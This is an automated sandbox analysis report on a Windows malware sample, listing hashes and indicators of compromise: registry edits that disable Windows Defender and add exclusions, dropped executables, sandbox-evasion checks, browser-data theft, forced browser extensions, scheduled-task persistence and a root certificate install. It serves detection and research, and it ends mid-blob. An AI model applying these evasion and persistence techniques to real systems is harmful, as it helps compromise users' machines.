16680cafa63ae8afbbfd5c5e72513afb28c5a4c5f3b41b58552b227c1eb64aab

Analysis

max time kernel
126s
max time network
133s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
24-09-2022 19:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.3MB
MD5

cd9f13014d059c401766c254a54504e2
SHA1

8ec01ea82312a89f395927b2567e15b03968bb00
SHA256

16680cafa63ae8afbbfd5c5e72513afb28c5a4c5f3b41b58552b227c1eb64aab
SHA512

6f97dacb11f9e6ec6440950dd3c522c41f3bacac8eaa70bca53102033fa7865171714229082848adaea4755a36374522fe10ba570abd84a9b4ad2eaa8d4e45df
SSDEEP

196608:91OYU0KG0VokvOXHFUQ+gX3hpTC/d0Kq0vVsMemBCvmk1o:3OYrKGlZXlUxgX3hpTC/d0gOhmX

Score

10^/10

discovery evasion spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereg.exereg.execonhost.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.execonhost.exereg.execonhost.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ATZmuaBwNwmU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QYiUKrukFVUn = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fxkldoUMcXUSOxVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ATZmuaBwNwmU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SHsJRQZsU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MYjwJFnMfsmfKHMw = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\aJAQLsoDkiWqC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fxkldoUMcXUSOxVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MYjwJFnMfsmfKHMw = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SHsJRQZsU = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\aJAQLsoDkiWqC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MYjwJFnMfsmfKHMw = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QYiUKrukFVUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MYjwJFnMfsmfKHMw = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Blocklisted process makes network request 6 IoCs

Processes:

rundll32.exe

flow pid process

29 1996 rundll32.exe
30 1996 rundll32.exe
31 1996 rundll32.exe
32 1996 rundll32.exe
33 1996 rundll32.exe
35 1996 rundll32.exe
Executes dropped EXE 4 IoCs

Processes:

Install.exeInstall.exeDoLwXEq.exeRbbMELy.exe

pid process

980 Install.exe
1160 Install.exe
1016 DoLwXEq.exe
1144 RbbMELy.exe

flow	pid	process
29	1996	rundll32.exe
30	1996	rundll32.exe
31	1996	rundll32.exe
32	1996	rundll32.exe
33	1996	rundll32.exe
35	1996	rundll32.exe

pid	process
980	Install.exe
1160	Install.exe
1016	DoLwXEq.exe
1144	RbbMELy.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

RbbMELy.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation RbbMELy.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation	RbbMELy.exe

Loads dropped DLL 12 IoCs

Processes:

file.exeInstall.exeInstall.exerundll32.exe

pid	process
1696	file.exe
980	Install.exe
980	Install.exe
980	Install.exe
980	Install.exe
1160	Install.exe
1160	Install.exe
1160	Install.exe
1996	rundll32.exe
1996	rundll32.exe
1996	rundll32.exe
1996	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

Processes:

RbbMELy.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	RbbMELy.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json	RbbMELy.exe

Drops file in System32 directory 23 IoCs

Processes:

RbbMELy.exeDoLwXEq.exepowershell.EXEpowershell.EXEpowershell.EXErundll32.exeInstall.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	RbbMELy.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	RbbMELy.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1	RbbMELy.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1	RbbMELy.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	DoLwXEq.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	RbbMELy.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04	RbbMELy.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9	RbbMELy.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	RbbMELy.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3	RbbMELy.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	DoLwXEq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04	RbbMELy.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	RbbMELy.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3	RbbMELy.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9	RbbMELy.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	DoLwXEq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	RbbMELy.exe

Drops file in Program Files directory 13 IoCs

Processes:

RbbMELy.exe

description	ioc	process
File created	C:\Program Files (x86)\ATZmuaBwNwmU2\UnTWofX.xml	RbbMELy.exe
File created	C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\rnWrfsk.dll	RbbMELy.exe
File created	C:\Program Files (x86)\aJAQLsoDkiWqC\TzNIYzX.xml	RbbMELy.exe
File created	C:\Program Files (x86)\QYiUKrukFVUn\bVnsQws.dll	RbbMELy.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	RbbMELy.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	RbbMELy.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	RbbMELy.exe
File created	C:\Program Files (x86)\SHsJRQZsU\eHOPTpS.xml	RbbMELy.exe
File created	C:\Program Files (x86)\ATZmuaBwNwmU2\pcGZXFoAYkwFP.dll	RbbMELy.exe
File created	C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\pScSBvY.xml	RbbMELy.exe
File created	C:\Program Files (x86)\aJAQLsoDkiWqC\tsbNTyv.dll	RbbMELy.exe
File created	C:\Program Files (x86)\SHsJRQZsU\cZFAkF.dll	RbbMELy.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	RbbMELy.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\VgOpnHVQDAdMZqNFB.job	schtasks.exe
File created	C:\Windows\Tasks\DNDvMcbpefrYjKZ.job	schtasks.exe
File created	C:\Windows\Tasks\mDNVJgqIdbaAfzWWp.job	schtasks.exe
File created	C:\Windows\Tasks\bNHXguvSZYiOwSiXLC.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1072	schtasks.exe
1832	schtasks.exe
944	schtasks.exe
1900	schtasks.exe
1932	schtasks.exe
1224	schtasks.exe
1496	schtasks.exe
1764	schtasks.exe
1584	schtasks.exe
1732	schtasks.exe
320	schtasks.exe
1976	schtasks.exe
544	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

wscript.exeRbbMELy.exerundll32.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	RbbMELy.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	RbbMELy.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{751EFCCA-4388-4200-AD3E-DF65C78BDE0C}\WpadDecisionTime = 000f3d6b48d0d801	RbbMELy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{751EFCCA-4388-4200-AD3E-DF65C78BDE0C}\WpadDecision = "0"	RbbMELy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	RbbMELy.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	RbbMELy.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-18-c4-da-14-fb\WpadDecisionTime = 000f3d6b48d0d801	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	RbbMELy.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	RbbMELy.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-18-c4-da-14-fb\WpadDecisionTime = 000f3d6b48d0d801	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	RbbMELy.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	RbbMELy.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	RbbMELy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-18-c4-da-14-fb\WpadDecisionReason = "1"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{751EFCCA-4388-4200-AD3E-DF65C78BDE0C}\52-18-c4-da-14-fb	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{751EFCCA-4388-4200-AD3E-DF65C78BDE0C}	RbbMELy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{751EFCCA-4388-4200-AD3E-DF65C78BDE0C}\WpadDecisionReason = "1"	RbbMELy.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{751EFCCA-4388-4200-AD3E-DF65C78BDE0C}\WpadNetworkName = "Network 2"	RbbMELy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	RbbMELy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-18-c4-da-14-fb\WpadDecision = "0"	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-18-c4-da-14-fb\WpadDecision = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	RbbMELy.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-18-c4-da-14-fb	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	RbbMELy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	RbbMELy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

RbbMELy.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	RbbMELy.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0